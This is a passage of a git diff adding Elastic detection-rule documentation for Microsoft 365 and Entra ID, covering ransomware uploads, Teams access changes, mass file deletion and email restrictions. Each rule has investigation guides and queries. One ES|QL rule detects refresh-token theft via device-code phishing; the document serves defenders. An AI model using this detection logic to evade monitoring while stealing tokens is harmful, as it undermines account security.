to prevent further uploads and potential spread of ransomware within the cloud environment. +- Quarantine the uploaded files flagged as potential ransomware to prevent access and further distribution. +- Conduct a thorough scan of the affected user's devices and cloud storage for additional signs of ransomware or other malicious activity. +- Notify the security operations team to initiate a deeper investigation into the source and scope of the ransomware activity, leveraging MITRE ATT&CK techniques for guidance. 
+- Restore any affected files from secure backups, ensuring that the backups are clean and free from ransomware. +- Review and update access controls and permissions for the affected user and related accounts to minimize the risk of future incidents. +- Escalate the incident to senior security management and, if necessary, involve legal or compliance teams to assess any regulatory implications. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"Potential ransomware activity" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc new file mode 100644 index 0000000000..3ef49c11fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed]] +=== Microsoft 365 Teams Custom Application Interaction Allowed + +Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 211 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Teams Custom Application Interaction Allowed* + + +Microsoft Teams allows organizations to enhance functionality by integrating custom applications, which can be developed and uploaded beyond the standard app store offerings. While beneficial for tailored solutions, this capability can be exploited by adversaries to maintain unauthorized access. 
The detection rule monitors changes in tenant settings that permit custom app interactions, flagging successful modifications as potential persistence threats. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action: TeamsTenantSettingChanged to identify when the change was made and by whom. +- Verify the identity of the user or account associated with the event to determine if the change was authorized or if the account may have been compromised. +- Check the o365.audit.Name field for "Allow sideloading and interaction of custom apps" to confirm that the alert corresponds to enabling custom app interactions. +- Investigate the o365.audit.NewValue field to ensure it is set to True, indicating that the setting was indeed changed to allow custom apps. +- Assess the event.outcome field to confirm the change was successful and not a failed attempt, which could indicate a different type of issue. +- Examine any recent custom applications uploaded to Microsoft Teams to ensure they are legitimate and not potentially malicious. +- Cross-reference with other security alerts or logs to identify any unusual activity around the time of the setting change that might suggest malicious intent. + + +*False positive analysis* + + +- Routine administrative changes to Microsoft Teams settings can trigger this rule. If a known and authorized administrator frequently updates tenant settings to allow custom apps, consider creating an exception for their user account to reduce noise. +- Organizations that regularly develop and deploy custom applications for internal use may see frequent alerts. In such cases, establish a process to document and approve these changes, and use this documentation to create exceptions for specific application deployment activities. +- Scheduled updates or maintenance activities that involve enabling custom app interactions might be misidentified as threats. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring rules to prevent false positives during these periods. +- If a third-party service provider is authorized to manage Teams settings, their actions might trigger alerts. Verify their activities and, if consistent and legitimate, add their actions to an exception list to prevent unnecessary alerts. +- Changes made during a known testing or development phase can be mistaken for unauthorized access. Clearly define and communicate these phases to the security team, and consider temporary rule adjustments to accommodate expected changes. + + +*Response and remediation* + + +- Immediately disable the custom application interaction setting in Microsoft Teams to prevent further unauthorized access or persistence by adversaries. +- Conduct a thorough review of all custom applications currently uploaded to Microsoft Teams to identify any unauthorized or suspicious applications. Remove any that are not recognized or approved by the organization. +- Analyze the audit logs for any recent changes to the Teams settings and identify the user account responsible for enabling custom application interactions. Investigate the account for signs of compromise or misuse. +- Reset the credentials and enforce multi-factor authentication for the account(s) involved in the unauthorized change to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident and the actions taken. Escalate to higher management if the breach is suspected to have wider implications. 
+- Implement additional monitoring and alerting for changes to Microsoft Teams settings to quickly detect and respond to similar threats in the future. +- Review and update the organization's security policies and procedures regarding the use of custom applications in Microsoft Teams to ensure they align with best practices and mitigate the risk of similar incidents. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:MicrosoftTeams and +event.category:web and event.action:TeamsTenantSettingChanged and +o365.audit.Name:"Allow sideloading and interaction of custom apps" and +o365.audit.NewValue:True and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc new file mode 100644 index 0000000000..4198bbf46e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled]] +=== Microsoft 365 Teams External Access Enabled + +Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoftteams/manage-external-access + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Teams External Access Enabled* + + +Microsoft Teams' external access feature allows users to communicate with individuals outside their organization, facilitating collaboration. However, adversaries can exploit this by enabling external access or adding trusted domains to exfiltrate data or maintain persistence. 
The detection rule monitors audit logs for changes in federation settings, specifically when external access is successfully enabled, indicating potential misuse. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.action "Set-CsTenantFederationConfiguration" to identify when and by whom the external access was enabled. +- Examine the o365.audit.Parameters.AllowFederatedUsers field to confirm that it is set to True, indicating that external access was indeed enabled. +- Investigate the user account associated with the event to determine if the action was authorized and if the account has a history of suspicious activity. +- Check the event.provider field to see if the change was made through SkypeForBusiness or MicrosoftTeams, which may provide additional context on the method used. +- Assess the event.outcome field to ensure the action was successful and not a failed attempt, which could indicate a potential security threat. +- Look into any recent changes in the list of allowed domains to identify if any unauthorized or suspicious domains have been added. + + +*False positive analysis* + + +- Routine administrative changes to federation settings can trigger alerts. Regularly review and document these changes to differentiate between legitimate and suspicious activities. +- Organizations with frequent collaboration with external partners may see increased alerts. Consider creating exceptions for known trusted domains to reduce noise. +- Scheduled updates or policy changes by IT teams might enable external access temporarily. Coordinate with IT to log these activities and exclude them from triggering alerts. +- Automated scripts or tools used for configuration management can inadvertently enable external access. Ensure these tools are properly documented and monitored to prevent false positives. +- Changes made during mergers or acquisitions can appear suspicious. Maintain a record of such events and adjust monitoring rules accordingly to account for expected changes. + + +*Response and remediation* + + +- Immediately disable external access in Microsoft Teams to prevent further unauthorized communication with external domains. +- Review and remove any unauthorized or suspicious domains added to the allowed list in the Teams federation settings. +- Conduct a thorough audit of recent changes in the Teams configuration to identify any other unauthorized modifications or suspicious activities. +- Reset credentials and enforce multi-factor authentication for accounts involved in the configuration change to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of data exfiltration or if the scope of the breach is unclear. +- Implement enhanced monitoring and alerting for changes in Teams federation settings to detect similar threats in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
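+
+Because federation settings change infrequently, it helps to baseline every federation configuration change before judging this one. A hedged variant of the rule query below removes the AllowFederatedUsers and outcome filters so that all attempts, including ones that disabled external access, are visible along with the accounts that made them:
+
+[source, js]
+----------------------------------
+event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and
+event.category:web and event.action:"Set-CsTenantFederationConfiguration"
+
+----------------------------------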
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and +event.category:web and event.action:"Set-CsTenantFederationConfiguration" and +o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc new file mode 100644 index 0000000000..bd0fd44b57 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled]] +=== Microsoft 365 Teams Guest Access Enabled + +Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Teams Guest Access Enabled* + + +Microsoft Teams allows organizations to collaborate with external users through guest access, facilitating communication and teamwork. However, adversaries can exploit this feature to gain persistent access to sensitive environments by enabling guest access without authorization. The detection rule monitors audit logs for specific configurations that indicate guest access has been enabled, helping identify unauthorized changes and potential security breaches. + + +*Possible investigation steps* + + +- Review the audit logs to confirm the event.action "Set-CsTeamsClientConfiguration" was successfully executed with the parameter o365.audit.Parameters.AllowGuestUser set to True. +- Identify the user account responsible for enabling guest access by examining the event logs for the user ID or account name associated with the action. 
+- Check the user's activity history to determine if there are any other suspicious actions or patterns, such as changes to other configurations or unusual login times. +- Investigate the context of the change by reviewing any related communications or requests that might justify enabling guest access, ensuring it aligns with organizational policies. +- Assess the potential impact by identifying which teams and channels now have guest access enabled and evaluate the sensitivity of the information accessible to external users. +- Contact the user or their manager to verify if the change was authorized and necessary, and document their response for future reference. + + +*False positive analysis* + + +- Legitimate collaboration with external partners may trigger alerts when guest access is enabled for business purposes. To manage this, create exceptions for known and approved external domains or specific projects that require guest access. +- Routine administrative actions by IT staff to enable guest access for specific teams or channels can be mistaken for unauthorized changes. Implement a process to log and approve such changes internally, and exclude these from triggering alerts. +- Automated scripts or third-party applications that configure Teams settings, including guest access, might cause false positives. Identify and whitelist these scripts or applications to prevent unnecessary alerts. +- Changes made during scheduled maintenance windows can be misinterpreted as unauthorized. Define and exclude these time periods from monitoring to reduce false positives. + + +*Response and remediation* + + +- Immediately disable guest access in Microsoft Teams by updating the Teams client configuration to prevent unauthorized external access. +- Conduct a thorough review of recent audit logs to identify any unauthorized changes or suspicious activities related to guest access settings. +- Notify the security team and relevant stakeholders about the potential breach to ensure awareness and initiate further investigation. +- Revoke any unauthorized guest accounts that have been added to Teams to eliminate potential persistence mechanisms. +- Implement additional monitoring on Teams configurations to detect any future unauthorized changes to guest access settings. +- Escalate the incident to the organization's incident response team for a comprehensive investigation and to determine if further containment actions are necessary. +- Review and update access control policies to ensure that enabling guest access requires appropriate authorization and oversight. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
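+
+As with other tenant-setting rules, reviewing who normally runs Set-CsTeamsClientConfiguration helps separate routine administration from persistence attempts. A hedged baseline search, derived from the rule query below by dropping the AllowGuestUser and outcome filters:
+
+[source, js]
+----------------------------------
+event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and
+event.category:web and event.action:"Set-CsTeamsClientConfiguration"
+
+----------------------------------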
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and +event.category:web and event.action:"Set-CsTeamsClientConfiguration" and +o365.audit.Parameters.AllowGuestUser:True and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc new file mode 100644 index 0000000000..e28eadb91b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion]] +=== Microsoft 365 Unusual Volume of File Deletion + +Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy +* https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Unusual Volume of File Deletion* + + +Microsoft 365's cloud environment facilitates file storage and collaboration, but its vast data handling capabilities can be exploited by adversaries for data destruction. Attackers may delete large volumes of files to disrupt operations or cover their tracks. The detection rule leverages audit logs to identify anomalies in file deletion activities, flagging successful, unusual deletion volumes as potential security incidents, thus enabling timely investigation and response. + + +*Possible investigation steps* + + +- Review the audit logs for the specific user associated with the alert to confirm the volume and context of the file deletions, focusing on entries with event.action:"Unusual volume of file deletion" and event.outcome:success. +- Correlate the timestamps of the deletion events with other activities in the user's account to identify any suspicious patterns or anomalies, such as unusual login locations or times. 
+- Check for any recent changes in user permissions or roles that might explain the ability to delete a large volume of files, ensuring these align with the user's typical responsibilities. +- Investigate any recent security alerts or incidents involving the same user or related accounts to determine if this activity is part of a broader attack or compromise. +- Contact the user or their manager to verify if the deletions were intentional and authorized, and gather any additional context that might explain the activity. +- Assess the impact of the deletions on business operations and data integrity, and determine if any recovery actions are necessary to restore critical files. + + +*False positive analysis* + + +- High-volume legitimate deletions during data migration or cleanup projects can trigger false positives. To manage this, create exceptions for users or groups involved in these activities during the specified time frame. +- Automated processes or scripts that perform bulk deletions as part of routine maintenance may be flagged. Identify these processes and whitelist them to prevent unnecessary alerts. +- Users with roles in data management or IT support may regularly delete large volumes of files as part of their job responsibilities. Establish a baseline for these users and adjust the detection thresholds accordingly. +- Temporary spikes in file deletions due to organizational changes, such as department restructuring, can be mistaken for malicious activity. Monitor these events and temporarily adjust the rule parameters to accommodate expected changes. +- Regularly review and update the list of exceptions to ensure that only legitimate activities are excluded from alerts, maintaining the effectiveness of the detection rule. + + +*Response and remediation* + + +- Immediately isolate the affected user account to prevent further unauthorized file deletions. This can be done by disabling the account or changing the password. +- Review the audit logs to identify the scope of the deletion and determine if any critical or sensitive files were affected. Restore these files from backups if available. +- Conduct a thorough review of the affected user's recent activities to identify any other suspicious actions or potential indicators of compromise. +- Escalate the incident to the security operations team for further investigation and to determine if the deletion is part of a larger attack or breach. +- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further unusual activities. +- Review and update access controls and permissions to ensure that users have the minimum necessary access to perform their job functions, reducing the risk of large-scale deletions. +- Coordinate with the IT and security teams to conduct a post-incident review, identifying any gaps in the response process and implementing improvements to prevent recurrence. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
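+
+To see whether the same account has triggered other Microsoft Cloud App Security anomaly detections, a hedged pivot on the alert source can be run alongside the rule query below. The o365.audit.UserId value is a placeholder and assumes that field is populated on SecurityComplianceCenter alert records in your environment; if it is not, pivot on whichever user field the original alert document carries:
+
+[source, js]
+----------------------------------
+event.dataset:o365.audit and event.provider:SecurityComplianceCenter and
+event.category:web and o365.audit.UserId:"jane.doe@example.com"
+
+----------------------------------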
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"Unusual volume of file deletion" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc new file mode 100644 index 0000000000..1c2e6c734a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc @@ -0,0 +1,112 @@ +[[prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email]] +=== Microsoft 365 User Restricted from Sending Email + +Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy +* https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 User Restricted from Sending Email* + + +Microsoft 365 enforces email sending limits to prevent abuse and ensure service integrity. Adversaries may exploit compromised accounts to send spam or phishing emails, triggering these limits. The detection rule monitors audit logs for successful restrictions by the Security Compliance Center, indicating potential misuse of valid accounts, aligning with MITRE ATT&CK's Initial Access tactic. + + +*Possible investigation steps* + + +- Review the audit logs in Microsoft 365 to confirm the event details, focusing on entries with event.dataset:o365.audit and event.provider:SecurityComplianceCenter to ensure the restriction was logged correctly. +- Identify the user account that was restricted by examining the event.action:"User restricted from sending email" and event.outcome:success fields to understand which account triggered the alert. 
+- Investigate the recent email activity of the restricted user account to determine if there was any unusual or suspicious behavior, such as a high volume of outbound emails or patterns consistent with spam or phishing. +- Check for any recent changes in account permissions or configurations that might indicate unauthorized access or compromise, aligning with the MITRE ATT&CK technique T1078 for Valid Accounts. +- Assess whether there are any other related alerts or incidents involving the same user or similar patterns, which could indicate a broader security issue or coordinated attack. + + +*False positive analysis* + + +- High-volume legitimate email campaigns by marketing or communication teams can trigger sending limits. Coordinate with these teams to understand their schedules and create exceptions for known campaigns. +- Automated systems or applications using Microsoft 365 accounts for sending notifications or alerts may exceed limits. Identify these accounts and consider using service accounts with appropriate permissions and limits. +- Users with delegated access to multiple mailboxes might inadvertently trigger restrictions. Review and adjust permissions or create exceptions for these users if their activity is verified as legitimate. +- Temporary spikes in email activity due to business needs, such as end-of-quarter communications, can cause false positives. Monitor these periods and adjust thresholds or create temporary exceptions as needed. +- Misconfigured email clients or scripts that repeatedly attempt to send emails can appear as suspicious activity. Ensure proper configuration and monitor for any unusual patterns that may need exceptions. + + +*Response and remediation* + + +- Immediately disable the compromised user account to prevent further unauthorized email activity and potential spread of phishing or spam. +- Conduct a password reset for the affected account and enforce multi-factor authentication (MFA) to enhance security and prevent future unauthorized access. +- Review the audit logs for any additional suspicious activities associated with the compromised account, such as unusual login locations or times, and investigate any anomalies. +- Notify the affected user and relevant stakeholders about the incident, providing guidance on recognizing phishing attempts and securing their accounts. +- Escalate the incident to the security operations team for further analysis and to determine if other accounts or systems have been compromised. +- Implement additional email filtering rules to block similar phishing or spam patterns identified in the incident to prevent recurrence. +- Update and enhance detection rules and monitoring to quickly identify and respond to similar threats in the future, leveraging insights from the current incident. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
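+
+The restricted account's recent Exchange activity can be reviewed with a hedged pivot such as the one below, run over the window preceding the restriction. The o365.audit.UserId value is a placeholder and assumes the field is populated for Exchange audit records in your tenant:
+
+[source, js]
+----------------------------------
+event.dataset:o365.audit and event.provider:Exchange and
+o365.audit.UserId:"jane.doe@example.com"
+
+----------------------------------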
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:"User restricted from sending email" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc new file mode 100644 index 0000000000..99a43d9e8a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc @@ -0,0 +1,180 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties]] +=== Microsoft Entra ID Concurrent Sign-Ins with Suspicious Properties + +Identifies concurrent azure signin events for the same user and from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/entra/identity/ +* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Concurrent Sign-Ins with Suspicious Properties* + + + +*Possible investigation steps* + + +- Review the sign-in logs to assess the context and reputation of the source.ip address. +- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious. +- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise. +- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access. +- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user. + + +*Response and remediation* + + +- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. 
This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions. +- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid. +- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse. +- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise. +- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts. +- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats. +- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event. + +==== Setup + + + +*Required Azure Entra Sign-In Logs* + +This rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* metadata _id, _version, _index + +// Scheduled to run every hour, reviewing events from past hour +| where + @timestamp > now() - 1 hours + and event.dataset == "azure.signinlogs" + and source.ip is not null + and azure.signinlogs.identity is not null + and to_lower(event.outcome) == "success" + +// keep relevant raw fields +| keep + @timestamp, + azure.signinlogs.identity, + source.ip, + azure.signinlogs.properties.authentication_requirement, + azure.signinlogs.properties.app_id, + azure.signinlogs.properties.resource_display_name, + azure.signinlogs.properties.authentication_protocol, + azure.signinlogs.properties.app_display_name + +// case classifications for identity usage +| eval + Esql.azure_signinlogs_properties_authentication_device_code_case = case( + azure.signinlogs.properties.authentication_protocol == "deviceCode" + and azure.signinlogs.properties.authentication_requirement != "multiFactorAuthentication", + azure.signinlogs.identity, + null), + + Esql.azure_signinlogs_auth_visual_studio_case = case( + azure.signinlogs.properties.app_id == "aebc6443-996d-45c2-90f0-388ff96faa56" + and azure.signinlogs.properties.resource_display_name == "Microsoft Graph", + azure.signinlogs.identity, + null), + + Esql.azure_signinlogs_auth_other_case = case( + azure.signinlogs.properties.authentication_protocol != "deviceCode" + and azure.signinlogs.properties.app_id != "aebc6443-996d-45c2-90f0-388ff96faa56", + azure.signinlogs.identity, + null) + +// Aggregate metrics by user identity +| stats + Esql.event_count = count(*), + Esql.azure_signinlogs_properties_authentication_device_code_case_count_distinct = 